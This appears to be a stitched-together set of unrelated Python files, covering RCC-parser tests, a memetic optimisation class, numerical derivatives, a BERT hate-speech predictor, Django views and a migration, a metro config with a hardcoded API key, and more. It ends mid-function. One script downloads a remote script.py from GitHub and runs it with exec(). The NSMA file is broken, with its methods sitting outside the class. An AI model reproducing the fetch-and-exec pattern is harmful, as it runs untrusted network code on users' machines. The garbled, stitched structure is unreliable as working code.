        self.assertEqual(name,'Code_Summary'.casefold())
    def test_messages(self):
        # the fixture's Messages tag is empty
        name,result = parse_tag(self.messages_tag)
        self.assertEqual(name,'Messages'.casefold())
        self.assertEqual(result,'')
class TestParseRCCFile(unittest.TestCase):
    """test parse_rcc_file function"""
    def setUp(self):
        self.example = 'test/example.RCC'
        # parse_rcc_file returns (per-gene counts, gene metadata records)
        self.sample_data,self.genes = parse_rcc_file(self.example)
    def test_sample_data(self):
        # counts are keyed by gene name and parsed as floats
        self.assertIsInstance(self.sample_data,OrderedDict)
        self.assertEqual(self.sample_data['hsa-miR-758|0'],12.0)
        self.assertEqual(self.sample_data['NEG_C(0)'],11.0)
        self.assertEqual(len(self.sample_data),20)
    def test_genes(self):
        # every gene record carries CodeClass/Accession/Name metadata
        self.assertIsInstance(self.genes,list)
        [self.assertIsInstance(i,OrderedDict) for i in self.genes]
        self.assertEqual(len(self.genes),4)
        self.assertIn('CodeClass',self.genes[0].keys())
        self.assertIn('Accession',self.genes[0].keys())
        self.assertIn('Name',self.genes[0].keys())
    def test_full_file(self):
        # expected sizes for the bundled full-size fixture
        data,genes = parse_rcc_file('test/full_file_test.RCC')
        self.assertEqual(len(genes),753)
        self.assertEqual(len(data),769)
class TestGetRccData(unittest.TestCase):
    """test get_rcc_data function"""
    def setUp(self):
        # use forward slashes so the glob works on every platform: the
        # previous raw-string backslash path was Windows-only (backslashes
        # are literal name characters in POSIX paths) and inconsistent
        # with the other tests' 'test/...' paths
        self.file_path = 'test/example_data_RCC/*RCC'
        self.data,self.genes = get_rcc_data(self.file_path)
    def test_input_type_raise(self):
        # non-string input must raise
        self.assertRaises(TypeError,get_rcc_data,12)
    def test_warning(self):
        self.assertWarns(UserWarning,get_rcc_data,self.file_path)
    def test_is_dataframe(self):
        self.assertIsInstance(self.data,pd.core.frame.DataFrame)
        self.assertIsInstance(self.genes,pd.core.frame.DataFrame)
    def test_output_size(self):
        # 12 samples x 769 data columns; 753 genes x 3 metadata columns
        self.assertTupleEqual(self.data.shape,(12,769))
        self.assertTupleEqual(self.genes.shape,(753,3))
if __name__ == "__main__":
    unittest.main()
import time
import numpy as np
from algorithms.memetic.memetic_algorithm import MemeticAlgorithm
from algorithms.genetic.nsga_ii import NSGAII
from problems.problem import Problem
class NSMA(NSGAII, MemeticAlgorithm):
"""
Class for the NSMA Algorithm
The main functions are:
- Initialize a NSMA instance;
- Execute the Algorithm starting from a set of initial points of the problem at hand;
- Compute the surrogate bounds based on the current population.
Notes: Like NSGA-II, NSMA does not require any selection operator.
"""
    def __init__(self,
                 max_iter: int,
                 max_time: float,
                 max_f_evals: int,
                 verbose: bool,
                 verbose_interspace: int,
                 plot_pareto_front: bool,
                 plot_pareto_solutions: bool,
                 plot_dpi: int,
                 pop_size: int,
                 crossover_probability: float,
                 crossover_eta: float,
                 mutation_eta: float,
                 shift: float,
                 crowding_quantile: float,
                 n_opt: int,
                 FMOPG_max_iter: int,
                 theta_for_stationarity: float,
                 theta_tol: float,
                 theta_dec_factor: float,
                 gurobi: bool,
                 gurobi_method: int,
                 gurobi_verbose: bool,
                 ALS_alpha_0: float,
                 ALS_delta: float,
                 ALS_beta: float,
                 ALS_min_alpha: float):
        """
        Initialize a NSMA instance
        :param max_iter: maximum number of iterations
        :param max_time: maximum number of elapsed minutes on a problem
        :param max_f_evals: maximum number of function evaluations
        :param verbose: if set to True, then the VerboseSystem instance is used during the Algorithm iterations
        :param verbose_interspace: space between a metric and another one in the printing of the VerboseSystem instance
        :param plot_pareto_front: if set to True, the Pareto front is plotted at each Algorithm iteration (see GraphicalPlot.py)
        :param plot_pareto_solutions: if set to True and whenever is possible, the Pareto solutions are plotted at each Algorithm iteration
        :param plot_dpi: it indicates the dpi of the image(s) containing the plot(s)
        :param pop_size: size of the population
        :param crossover_probability: see nsga_ii.py
        :param crossover_eta: see nsga_ii.py
        :param mutation_eta: see nsga_ii.py
        :param shift: shift value used to calculate the surrogate bounds
        :param crowding_quantile: requested quantile of the finite crowding distances related to the rank-0 feasible points
        :param n_opt: every n_opt iterations, the FMOPG Algorithm is called on some points (see the function search (np.array, np.array, Problem))
        :param FMOPG_max_iter: maximum number of iterations for the FMOPG Algorithm
        :param theta_for_stationarity: it indicates the tolerance after which a point is considered Pareto-stationary for the NSMA Algorithm; it can be seen as the epsilon value for the epsilon-Pareto-stationarity; for more details, the user is referred to the article
        :param theta_tol: it indicates the tolerance after which a point is considered Pareto-stationary for the FMOPG Algorithm; it can be seen as the epsilon value for the epsilon-Pareto-stationarity; for more details, the user is referred to the article
        :param theta_dec_factor: it indicates the coefficient for the theta_tol value contraction
        :param gurobi: if set to True, the Gurobi Optimizer is used to solve the search direction problem
        :param gurobi_method: it indicates the method used by the Gurobi Optimizer
        :param gurobi_verbose: if set to True, it enables the verbosity for the Gurobi optimizer
        :param ALS_alpha_0: it indicates the initial step size for the Armijo-Type Line Search
        :param ALS_delta: it indicates the coefficient for the step size contraction
        :param ALS_beta: it indicates the coefficient for the sufficient decrease condition
        :param ALS_min_alpha: it indicates the minimum value of alpha that is considered by the Armijo-Type Line Search; after that, the line search fails returning a null step size
        Notes: theta_tol must be smaller than theta_for_stationarity (both are negative numbers).
        In order to use the Gurobi Optimizer, you need it installed in your computer and, in addition, you need a Gurobi Licence.
        For more details on Gurobi, the user is referred to the Gurobi website (https://www.gurobi.com/).
        """
        # initialize the genetic half of the algorithm (NSGA-II operators)
        NSGAII.__init__(self,
                        max_iter,
                        max_time,
                        max_f_evals,
                        verbose,
                        verbose_interspace,
                        plot_pareto_front,
                        plot_pareto_solutions,
                        plot_dpi,
                        pop_size,
                        crossover_probability,
                        crossover_eta,
                        mutation_eta)
        # initialize the memetic half; the trailing dict carries the
        # settings forwarded to the local-search ('FMOPG') solver
        MemeticAlgorithm.__init__(self,
                                  max_iter, max_time, max_f_evals, verbose, verbose_interspace, plot_pareto_front, plot_pareto_solutions, plot_dpi,
                                  pop_size,
                                  theta_tol,
                                  gurobi, gurobi_method, gurobi_verbose, ALS_alpha_0, ALS_delta, ALS_beta, ALS_min_alpha,
                                  crowding_quantile, n_opt, theta_for_stationarity, theta_dec_factor,
                                  'FMOPG',
                                  {'theta_tol': theta_tol, 'gurobi': gurobi, 'gurobi_method': gurobi_method, 'gurobi_verbose': gurobi_verbose, 'ALS_alpha_0': ALS_alpha_0, 'ALS_delta': ALS_delta, 'ALS_beta': ALS_beta, 'ALS_min_alpha': ALS_min_alpha, 'FMOPG_max_iter': FMOPG_max_iter, 'max_time': max_time, 'max_f_evals': max_f_evals})
        # shift used when computing surrogate bounds (get_surrogate_bounds)
        self.__shift = shift
def search(self, p_list: np.ndarray, f_list: np.ndarray, problem: Problem):
    """
    Execution of the Algorithm, given some initial points of the problem at hand

    :param p_list: initial problem solutions, one row per point
    :param f_list: related points in the objectives space, one row per point
    :param problem: the considered problem
    :return: the new solutions (p_list, f_list) and the elapsed time

    NOTE(review): the 'max_time' stopping-condition slot stores the start
    timestamp; the elapsed time is recovered from it at return.
    """
    self.update_stopping_condition_current_value('max_time', time.time())
    # Number of objective functions.
    m = f_list.shape[1]
    # Return a list of every possible subset of objective functions indices. #
    objectives_powerset = self.objectives_powerset(m)
    # Computation of the rank, crowding distance and constraint violation for each problem solution. #
    # Every initial point is considered not epsilon-Pareto-stationary. #
    # A point's violation is the sum of the positive parts of its constraint values.
    constraint_violations = np.array([[sum([constraint if constraint > 0 else 0 for constraint in problem.evaluate_constraints(p)])] for p in p_list])
    # One stationarity flag per point and per subset of the objectives.
    eps_pareto_stationarity = np.array([[False] * len(objectives_powerset)] * p_list.shape[0])
    p_list, f_list, constraint_violations, rank_list, crowding_list, eps_pareto_stationarity, _ = self._survival_strategy.get_survivals(p_list, f_list, constraint_violations, eps_pareto_stationarity)
    self.show_figure(p_list, f_list)
    threshold_crowding_distance = None
    while not self.evaluate_stopping_conditions():
        # VerboseSystem: the metrics specific for NSMA are the maximum finite rank, the maximum rank (including the infinity values) and the minimum crowding distance. #
        self.output_data(f_list, max_finite_rank=max(rank_list[np.isfinite(rank_list)]), max_rank=max(rank_list.flatten()), min_crowding_dist=min(crowding_list.flatten()))
        # Computation of the surrogate bounds to find the offsprings. #
        surrogate_lb, surrogate_ub = self.get_surrogate_bounds(p_list, problem)
        # Get the offsprings from the current population. #
        p_list_off = self.get_offsprings(p_list, f_list, constraint_violations, crowding_list, problem, surrogate_lb=surrogate_lb, surrogate_ub=surrogate_ub)
        if len(p_list_off) != 0:
            # Evaluate the objectives of every offspring and count the evaluations.
            f_list_off = np.zeros((p_list_off.shape[0], problem.m))
            for index_p_off in range(p_list_off.shape[0]):
                f_list_off[index_p_off, :] = problem.evaluate_functions(p_list_off[index_p_off, :])
            self.add_to_stopping_condition_current_value('max_f_evals', p_list_off.shape[0])
            constraint_violations_off = np.array([[sum([constraint if constraint > 0 else 0 for constraint in problem.evaluate_constraints(p_off)])] for p_off in p_list_off])
            p_list = np.concatenate((p_list, p_list_off), axis=0)
            f_list = np.concatenate((f_list, f_list_off), axis=0)
            constraint_violations = np.concatenate((constraint_violations, constraint_violations_off), axis=0)
            # Every new offspring is considered not epsilon-Pareto-stationarity. #
            eps_pareto_stationarity = np.concatenate((eps_pareto_stationarity, np.array([[False] * len(objectives_powerset)] * p_list_off.shape[0])), axis=0)
        # Given the current population and the offsprings, the survival strategy is used to get at most pop_size survivals. #
        p_list, f_list, constraint_violations, rank_list, crowding_list, eps_pareto_stationarity, threshold_crowding_distance = self._survival_strategy.get_survivals(p_list, f_list, constraint_violations, eps_pareto_stationarity)
        self.show_figure(p_list, f_list)
        # Every n_opt iterations, the FMOPG Algorithm is called on some points. #
        if self.get_stopping_condition_current_value('max_iter') % self._n_opt == 0:
            optimization_success = False
            one_tried_optimization = False
            theta_fault = True
            for p in range(p_list.shape[0]):
                if self.evaluate_stopping_conditions():
                    break
                """
                The points to optimize through the FMOPG Algorithm are the ones with:
                - rank 0;
                - no constraint violation;
                - a crowding-distance that is higher than or equal to the threshold_crowding_distance (the requested quantile of the finite crowding distances related to the rank-0 feasible points).
                """
                if rank_list[p] == 0 and constraint_violations[p] == 0 and crowding_list[p] >= threshold_crowding_distance:
                    # The selected points are optimized w.r.t. each subset of the objective functions indices, if they are not epsilon-Pareto-stationary for that subset. #
                    for index_I_p, I_p in enumerate(objectives_powerset):
                        if not eps_pareto_stationarity[p, index_I_p]:
                            if self.evaluate_stopping_conditions():
                                break
                            # In order to be optimized for a subset of the objective functions indices, the point must be not dominated by other points w.r.t. that subset. #
                            if self.exists_dominating_point(f_list[p, I_p,], np.delete(f_list, p, 0)[:, I_p, ]):
                                continue
                            one_tried_optimization = True
                            n_current_points = p_list.shape[0]
                            # theta_tol indicates the tolerance after which a point is considered Pareto-stationary for the FMOPG Algorithm. #
                            self._local_search_optimizer.reset_stopping_conditions_current_values(self._theta_tol)
                            p_list, f_list, theta_array = self._local_search_optimizer.search(p_list, f_list, problem, index_initial_point=p, I=I_p)
                            # Account for the evaluations spent inside the local search.
                            self.update_stopping_condition_current_value('max_f_evals', self._local_search_optimizer.get_stopping_condition_current_value('max_f_evals'))
                            # theta_for_stationarity indicates the tolerance after which a point is considered Pareto-stationary for the NSMA Algorithm. #
                            if theta_array[0] >= self._theta_for_stationarity:
                                eps_pareto_stationarity[p, index_I_p] = True
                            if p_list.shape[0] > n_current_points:
                                # At least one new point is obtained by the FMOPG Algorithm. #
                                optimization_success = True
                                theta_fault = False
                                for index_new_point in range(n_current_points, p_list.shape[0]):
                                    constraint_violations = np.concatenate((constraint_violations, np.array([[sum([constraint if constraint > 0 else 0 for constraint in problem.evaluate_constraints(p_list[index_new_point, :])])]])), axis=0)
                                    eps_pareto_stationary_tmp = np.array([[False] * len(objectives_powerset)])
                                    if theta_array[index_new_point - n_current_points + 1] >= self._theta_for_stationarity:
                                        eps_pareto_stationary_tmp[0, index_I_p] = True
                                    eps_pareto_stationarity = np.concatenate((eps_pareto_stationarity, eps_pareto_stationary_tmp), axis=0)
                            else:
                                if (theta_array < self._theta_tol).any():
                                    theta_fault = False
            if optimization_success:
                # If at least a point from the FMOPG Algorithm is obtained, NSMA uses the survival strategy to get at most pop_size survivals. #
                p_list, f_list, constraint_violations, rank_list, crowding_list, eps_pareto_stationarity, _ = self._survival_strategy.get_survivals(p_list, f_list, constraint_violations, eps_pareto_stationarity)
            # If at least a point from the FMOPG Algorithm is obtained or no point is generated because theta_tol is too small (negative number), then theta_tol is contracted through the coefficient theta_dec_factor. #
            self._theta_tol *= self._theta_dec_factor if optimization_success or (one_tried_optimization and theta_fault) else 1
            self.show_figure(p_list, f_list)
        self.add_to_stopping_condition_current_value('max_iter', 1)
    self.close_figure()
    self.output_data(f_list, max_finite_rank=max(rank_list[np.isfinite(rank_list)]), max_rank=max(rank_list.flatten()), min_crowding_dist=min(crowding_list.flatten()))
    return p_list, f_list, time.time() - self.get_stopping_condition_current_value('max_time')
def get_surrogate_bounds(self, p_list: np.ndarray, problem: Problem):
    """
    Compute the surrogate bounds based on the current population.

    The population's bounding box, enlarged by the shift parameter on each
    side, is intersected element-wise with the problem's box [lb, ub].

    :param p_list: population solutions, one row per point
    :param problem: the problem at hand
    :return: the surrogate bounds (lower, upper)
    """
    enlarged_min = np.min(p_list, axis=0) - self.__shift
    enlarged_max = np.max(p_list, axis=0) + self.__shift
    surrogate_lb = np.max(np.array([problem.lb, enlarged_min]), axis=0)
    surrogate_ub = np.min(np.array([problem.ub, enlarged_max]), axis=0)
    return surrogate_lb, surrogate_ub
|
# Script of derivate computation
import numpy as np
import matplotlib.pyplot as plt
def dfdx_1(f, x, h):
    """Forward-difference approximation of f'(x): (f(x+h) - f(x)) / h, O(h) error."""
    ahead = f(x + h)
    here = f(x)
    return (ahead - here) / h
def dfdx_2(f, x, h):
    """Backward-difference approximation of f'(x): (f(x) - f(x-h)) / h, O(h) error."""
    here = f(x)
    behind = f(x - h)
    return (here - behind) / h
def dfdx_3(f, x, h):
    """Central-difference approximation of f'(x): (f(x+h) - f(x-h)) / (2h), O(h^2) error."""
    spread = f(x + h) - f(x - h)
    return spread / (2 * h)
def dfdx_4(f, x, h):
    """Five-point-stencil approximation of f'(x), O(h^4) error.

    Fixed: the denominator of the five-point first-derivative formula is
    12*h, not 2*h — the original overestimated the derivative by a factor
    of 6 (check with f(x) = x: the numerator equals 12*h).
    """
    return (-f(x + 2*h) + 8*f(x + h) - 8*f(x - h) + f(x - 2*h))/(12*h)
# Compare the four finite-difference schemes against the exact derivative
# of y = sin(100x) on one period-fraction of the oscillation.
n = 200
x = np.linspace(0, np.pi / 50, n + 1)
h = (np.pi / 50) / n

def sin100x(x):
    """y = sin(100 x); exact derivative is 100 cos(100 x)."""
    return np.sin(100 * x)

dydx_1 = dfdx_1(sin100x, x, h)
dydx_2 = dfdx_2(sin100x, x, h)
dydx_3 = dfdx_3(sin100x, x, h)
dydx_4 = dfdx_4(sin100x, x, h)
# Exact derivative for reference.
dYdx = 100 * np.cos(100 * x)
#plt.figure(figsize=(12,5))
plt.plot(x, dydx_1, '.', label='Approx left method')
plt.plot(x, dydx_2, '.', label='Approx right method')
plt.plot(x, dydx_3, '.', label='Approx central method')
plt.plot(x, dydx_4, '.', label='Approx five point method')
plt.plot(x, dYdx, 'b', label='Exact Value')
# Fixed: the plotted function is sin(100x), not cos(100x).
plt.title('Derivative of y = sin(100x)')
plt.legend(loc='best')
plt.show()
|
import argparse
import logging
import os
import koco
import pandas as pd
import torch
import torch.nn.functional as F
from omegaconf import OmegaConf
from transformers import BertForSequenceClassification
from utils import get_device_and_ngpus, makedirs, read_lines
logger = logging.getLogger(__name__)
# Device (CPU/GPU) selection is delegated to the project helper.
device, n_gpus = get_device_and_ngpus()
# All prediction output files are written under this directory.
result_dir = "results"
makedirs(result_dir)
def main(conf, testfile, save):
    """Load a fine-tuned BERT classifier and predict labels for a test set.

    :param conf: config holding checkpoint_dir, log_dir and model_name
    :param testfile: the sentinel "koco-test" for the korean-hate-speech
        test split, or a path to a plain-text file with one comment per line
    :param save: when True, write predictions under `results/` instead of
        printing them to stdout
    """
    # Load saved data
    checkpoint_path = f"{conf.checkpoint_dir}/{conf.model_name}.pt"
    log_path = f"{conf.log_dir}/{conf.model_name}.log"
    saved_model = torch.load(checkpoint_path, map_location=device)["model"]
    saved_data = torch.load(log_path, map_location=device)
    tokenizer = saved_data["tokenizer"]
    config = saved_data["config"]
    label2idx = saved_data["classes"]
    idx2label = {idx: label for label, idx in label2idx.items()}

    if testfile == "koco-test":
        test = koco.load_dataset("korean-hate-speech", mode="test")
        if config.label.hate and config.label.bias:
            # Joint hate+bias models need gold bias labels for the test split,
            # which are only available from a local dataset checkout.
            if os.path.exists(
                "korean-hate-speech-dataset/labeled/test.bias.ternary.tsv"
            ):
                df = pd.read_csv(
                    "korean-hate-speech-dataset/labeled/test.bias.ternary.tsv", sep="\t"
                )
            else:
                raise NotImplementedError(
                    "Adding external bias information is not supported, yet"
                )
            # Rebuild `test` so each item carries its bias label.
            test = []
            for i, row in df.iterrows():
                test.append({"comments": row["comments"], "bias": row["label"]})
    else:
        # Arbitrary text file: one comment per line, no bias labels.
        test = []
        for line in read_lines(testfile):
            test.append({"comments": line})

    # Build the model inputs; bias-aware models get a "<bias>" prefix.
    test_texts = []
    for t in test:
        test_text = t["comments"]
        if config.label.hate and config.label.bias:
            bias_context = f'<{t["bias"]}>'
            test_text = f"{bias_context} {test_text}"
        test_texts.append(test_text)

    with torch.no_grad():
        # Declare model and load pre-trained weights
        model = BertForSequenceClassification.from_pretrained(
            config.pretrained_model, num_labels=len(label2idx)
        )
        # Match the embedding matrix to the tokenizer when extra tokens were
        # registered at training time.
        if config.tokenizer.register_names:
            model.resize_token_embeddings(len(tokenizer))
        elif config.label.hate and config.label.bias:
            model.resize_token_embeddings(len(tokenizer))
        model.load_state_dict(saved_model)
        model.to(device)

        # Predict!
        model.eval()
        y_hats, tokens = [], []
        for index in range(0, len(test_texts), config.train_hparams.batch_size):
            batch = test_texts[index : index + config.train_hparams.batch_size]
            batch_tokenized = tokenizer(
                batch, padding=True, truncation=True, return_tensors="pt"
            )
            x = batch_tokenized["input_ids"]
            mask = batch_tokenized["attention_mask"]
            x = x.to(device)
            mask = mask.to(device)
            y_hat = F.softmax(model(x, attention_mask=mask)[0], dim=-1)
            y_hats += [y_hat]
            # Keep the tokenized form of each comment for the report files.
            batch_token_lists = [tokenizer.tokenize(t) for t in batch]
            tokens += batch_token_lists
        y_hats = torch.cat(y_hats, dim=0)  # (len(test), n_classes)
        probs, indices = y_hats.cpu().topk(1)

    # Print!
    if not save:
        for test_text, index, token in zip(test_texts, indices, tokens):
            print(test_text)
            print(" ".join(token))
            print(idx2label[int(index[0])])
            print("======================================================")

    # Save!
    if save:
        # Save test comment + predicted label
        with open(
            f"{result_dir}/{os.path.basename(testfile)}.{conf.model_name}.predict", "w"
        ) as f:
            f.write("comments" + "\t" + "prediction" + "\n")
            for test_text, index in zip(test_texts, indices):
                f.write(test_text + "\t" + str(idx2label[int(index[0])]) + "\n")
        # Save tokenized test comment + predicted label
        with open(
            f"{result_dir}/{os.path.basename(testfile)}.{conf.model_name}.tokens", "w"
        ) as f:
            f.write("tokens" + "\t" + "prediction" + "\n")
            for token, index in zip(tokens, indices):
                f.write(" ".join(token) + "\t" + str(idx2label[int(index[0])]) + "\n")
if __name__ == "__main__":
    # CLI: --config is mandatory; exactly one of --koco-test / --filepath
    # selects the input source.
    parser = argparse.ArgumentParser()
    parser.add_argument("--config", help="Path of the config yaml", required=True)
    parser.add_argument("--save", help="Save the prediction", action="store_true")
    input_group = parser.add_mutually_exclusive_group(required=True)
    input_group.add_argument(
        "--koco-test",
        action="store_true",
        help="Run model on korean-hate-speech testset",
    )
    input_group.add_argument("--filepath", help="Run model on given file")
    args = parser.parse_args()
    # "koco-test" is a sentinel value understood by main().
    testfile = "koco-test" if args.koco_test else args.filepath
    config = OmegaConf.load(args.config)
    main(config, testfile, args.save)
|
from django.http.response import JsonResponse
from django.shortcuts import render
from rest_framework import status
from rest_framework.decorators import api_view
from rest_framework.parsers import JSONParser
from products.models import Product
from products.serializers import ProductSerializer
# Create your views here.
@api_view(['GET', 'POST', 'DELETE'])
def product_list(request):
    """List all products (GET), create one (POST) or delete every product (DELETE)."""
    if request.method == 'GET':
        # Optional ?title=... case-insensitive substring filter.
        products = Product.objects.all()
        title = request.GET.get('title', None)
        if title is not None:
            products = products.filter(title__icontains=title)
        serializer = ProductSerializer(products, many=True)
        # 'safe=False' is needed to serialize a list instead of a dict.
        return JsonResponse(serializer.data, safe=False)
    elif request.method == 'POST':
        payload = JSONParser().parse(request)
        serializer = ProductSerializer(data=payload)
        if not serializer.is_valid():
            return JsonResponse(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
        serializer.save()
        return JsonResponse(serializer.data, status=status.HTTP_201_CREATED)
    elif request.method == 'DELETE':
        # queryset.delete() returns (total_count, per-model dict).
        count = Product.objects.all().delete()
        return JsonResponse({'message': '{} products were deleted successfully!'.format(count[0])}, status=status.HTTP_204_NO_CONTENT)
@api_view(['GET', 'PUT', 'DELETE'])
def product_detail(request, pk):
    """Retrieve (GET), update (PUT) or remove (DELETE) one product by primary key."""
    try:
        product = Product.objects.get(pk=pk)
    except Product.DoesNotExist:
        return JsonResponse({'message': 'The product does not exist'}, status=status.HTTP_404_NOT_FOUND)

    if request.method == 'GET':
        return JsonResponse(ProductSerializer(product).data)
    elif request.method == 'PUT':
        payload = JSONParser().parse(request)
        serializer = ProductSerializer(product, data=payload)
        if not serializer.is_valid():
            return JsonResponse(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
        serializer.save()
        return JsonResponse(serializer.data)
    elif request.method == 'DELETE':
        product.delete()
        return JsonResponse({'message': 'Product was deleted successfully!'}, status=status.HTTP_204_NO_CONTENT)
# GET / PUT / DELETE products
|
import json
# Fallback configuration used when config.json is missing or unreadable —
# hardcoded for resetting purposes or in case the config.json file is deleted.
# NOTE(review): the API key is committed in source; confirm it is meant to be
# public, otherwise move it out of version control.
defaultconfig={'station':'B08','apikey':'kfgpmgvfgacx98de9q3xazww','walktime':'6','loop':'False','simulate':'True'}
class myMetro:
    """
    Class for personal metro data. Most of this is obtained from config file,
    at least currently.
    """

    # Fallback values used when config.json is missing or unreadable
    # (kept identical to the module-level ``defaultconfig``).
    _DEFAULT_CONFIG = {'station': 'B08', 'apikey': 'kfgpmgvfgacx98de9q3xazww',
                       'walktime': '6', 'loop': 'False', 'simulate': 'True'}

    def __init__(self):
        try:
            # Fixed: close the file handle deterministically (the original
            # leaked the handle from open() inside json.load()).
            with open('config.json') as config_file:
                metroconf = json.load(config_file)
        except (OSError, ValueError):
            # Fixed: was a bare `except:`. OSError covers a missing/unreadable
            # file; ValueError covers invalid JSON (json.JSONDecodeError is a
            # ValueError subclass).
            print("Error loading JSON, defaulting to standard config")
            metroconf = self._DEFAULT_CONFIG
        self.station = metroconf['station']
        self.apikey = metroconf['apikey']
        self.walktime = int(metroconf['walktime'])  # minutes to walk to station

    def url(self):
        """Return the WMATA rail-prediction endpoint URL for this station and key."""
        return "http://api.wmata.com/StationPrediction.svc/json/GetPrediction/" + self.station + "?api_key=" + self.apikey
|
def read_lines(file_name):
    """Read *file_name*, drop blank lines, lowercase each line, return them reversed.

    Fixes over the original: the file handle is closed via a context manager
    (it was leaked), and only a trailing newline is stripped — `l[:-1]`
    silently truncated the last character of a final line that lacked a
    newline.
    """
    with open(file_name) as fh:
        raw = fh.readlines()
    lines = [line.rstrip("\n").lower() for line in raw if line != "\n"]
    lines.reverse()
    return lines
def read_def(lines, title=None):
    """Pop the next "name:count" entry off *lines* and parse it.

    When *title* is None, return (name, count); otherwise assert the parsed
    name equals *title* and return only the count.
    """
    name, count = lines.pop().split(":")
    if title is None:
        return name, int(count)
    assert name == title
    return int(count)
"""
Given a string (with words and spaces), split it into substrings that have at most k characters each.
Each substring must contain whole words only. Assume that k is at least as large as the longest word in the sentence.
Example:
s = "I pet my cats and dogs"
k = 5
expected output: ['I pet', 'my', 'cats', 'and', 'dogs']
Example 2:
s = "the quick brown fox jumps over the lazy dog"
k = 15
expected output: ['the quick brown', 'fox jumps over', 'the lazy dog']
"""
class Solution:
    def splitSentence(self, s, k):
        """Greedily pack whole words into chunks of at most k characters.

        Words are separated by single spaces. Fixed: the original looped
        forever when a single word was longer than k (it reset i = j without
        advancing j); such a word now becomes a chunk of its own, which may
        exceed k.

        :param s: input sentence
        :param k: maximum chunk length
        :return: list of chunk strings
        """
        output = []
        current = []       # words of the chunk being built
        current_len = 0    # length of " ".join(current)
        for word in s.split(" "):
            # Chunk length if `word` were appended (+1 for the joining space).
            extended = current_len + len(word) + (1 if current else 0)
            if current and extended > k:
                output.append(" ".join(current))
                current = [word]
                current_len = len(word)
            else:
                current.append(word)
                current_len = extended
        output.append(" ".join(current))
        return output

    def test(self):
        """Smoke test: prints the chunks for one of the examples above."""
        #s = "I pet my cats and dogs"; k = 5
        s = "the quick brown fox jumps over the lazy dog"; k = 15
        result = self.splitSentence(s, k)
        print("result: ", result)
# Quick manual check: prints the chunks for the second example.
s = Solution()
s.test()
|
# We can efficiently solve for multiple potentials with one command
# Under the hood, using the batch functionality is more efficient
# than solving for one potential at a time because executing in batch
# doesn't require transitioning back in forth between the python
# and the C backend between jobs.
import schrod
import numpy as np
# Specify the 10 ho potentials
x = np.linspace(-5, 5, 200)
ws=np.arange(1,11)
V = 1/2 * np.outer(ws**2, x**2)
# Create and solve Schrodinger's equation
eqn = schrod.Schrod(x, V, n_basis=40)
eqn.solve()
# Print the first five eigenvalues
print(eqn.eigs[...,0:5])
|
import urllib.request
import time
# Try to download the script for up to ~3 minutes: 18 attempts, 10 s apart.
success = False
for i in range(6 * 3):
    try:
        url = 'https://raw.githubusercontent.com/wkcn/SYSULAB/master/script.py'
        req = urllib.request.Request(url)
        f = urllib.request.urlopen(req)
        s = f.read()
        success = True
        break
    except urllib.error.URLError:
        # Fixed: URLError also covers HTTPError, so DNS/connection failures
        # now retry too (the original caught HTTPError only).
        # Fixed: was `sleep(10)` — a NameError, since only `time` is imported.
        time.sleep(10)
if success:
    # SECURITY: this executes code fetched over the network. Only acceptable
    # if the source repository is fully trusted; consider verifying a
    # checksum of the payload before executing it.
    exec(s)
|
# Sum the first N ratios of consecutive Fibonacci-like terms:
# 2/1 + 3/2 + 5/3 + 8/5 + ... and print the result with two decimals.
N = int(input())
total = 0
numerator, denominator = 2, 1
for _ in range(N):
    total += numerator / denominator
    # Advance to the next ratio: (a, b) -> (a + b, a).
    numerator, denominator = numerator + denominator, numerator
print('{:.2f}'.format(total))
from django.shortcuts import render_to_response, get_object_or_404
from django.template import RequestContext
from django.http import *
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth.decorators import login_required
from django.contrib.auth.decorators import login_required
from django.utils.decorators import method_decorator
from smarter.views import GenericViews
from web.models import *
import taggit
from git import *
def home(request):
    # Renders the bare base template as HTML.
    # NOTE(review): render_to_response/context_instance/mimetype belong to
    # legacy Django — confirm the version pinned by this project.
    return render_to_response( "base.html", context_instance = RequestContext( request ), mimetype = "text/html" )
def welcome(request):
    # Renders the bare base template as HTML (same output as `home`).
    return render_to_response( "base.html", context_instance = RequestContext( request ), mimetype = "text/html" )
|
# Generated by Django 3.0 on 2021-01-16 10:31
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Create the Favourite model: a user's bookmarked course.

    Auto-generated by Django; `unique_together` guarantees one favourite
    per (user, course) pair, and both foreign keys cascade on delete.
    """

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ("grades", "0026_remove_grade_semester_code"),
    ]

    operations = [
        migrations.CreateModel(
            name="Favourite",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                ("created_date", models.DateTimeField(auto_now_add=True)),
                (
                    "course",
                    models.ForeignKey(
                        on_delete=django.db.models.deletion.CASCADE,
                        related_name="user_favourites",
                        to="grades.Course",
                    ),
                ),
                (
                    "user",
                    models.ForeignKey(
                        on_delete=django.db.models.deletion.CASCADE,
                        related_name="favourite_courses",
                        to=settings.AUTH_USER_MODEL,
                    ),
                ),
            ],
            options={
                # Newest favourites first.
                "ordering": ("-created_date",),
                "unique_together": {("user", "course")},
            },
        ),
    ]
|
from __future__ import print_function, absolute_import, division
from builtins import map
from future.builtins import *
from future import standard_library
standard_library.install_aliases()
# Copyright 2017 Autodesk Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from moldesign import units as u
import numpy as np
import collections
import webcolors
DEF_CATEGORICAL = 'Paired'
DEF_SEQUENTIAL = None # should be inferno, but that's only MPL >1.5
def colormap(cats, mplmap='auto', categorical=None):
    """ Map a series of categories to hex colors, using a matplotlib colormap

    Generates both categorical and numerical colormaps.

    Args:
        cats (Iterable): list of categories or numerical values
        mplmap (str): name of matplotlib colormap object
        categorical (bool): If None
            (the default) interpret data as numerical only if it can be cast to float.
            If True, interpret this data as categorical. If False, cast the data to float.

    Returns:
        List[str]: List of hexadecimal RGB color values in the in the form ``'#000102'``
    """
    # Should automatically choose the right colormaps for:
    #  categorical data
    #  sequential data (low, high important)
    #  diverging data (low, mid, high important)
    global DEF_SEQUENTIAL
    from matplotlib import cm
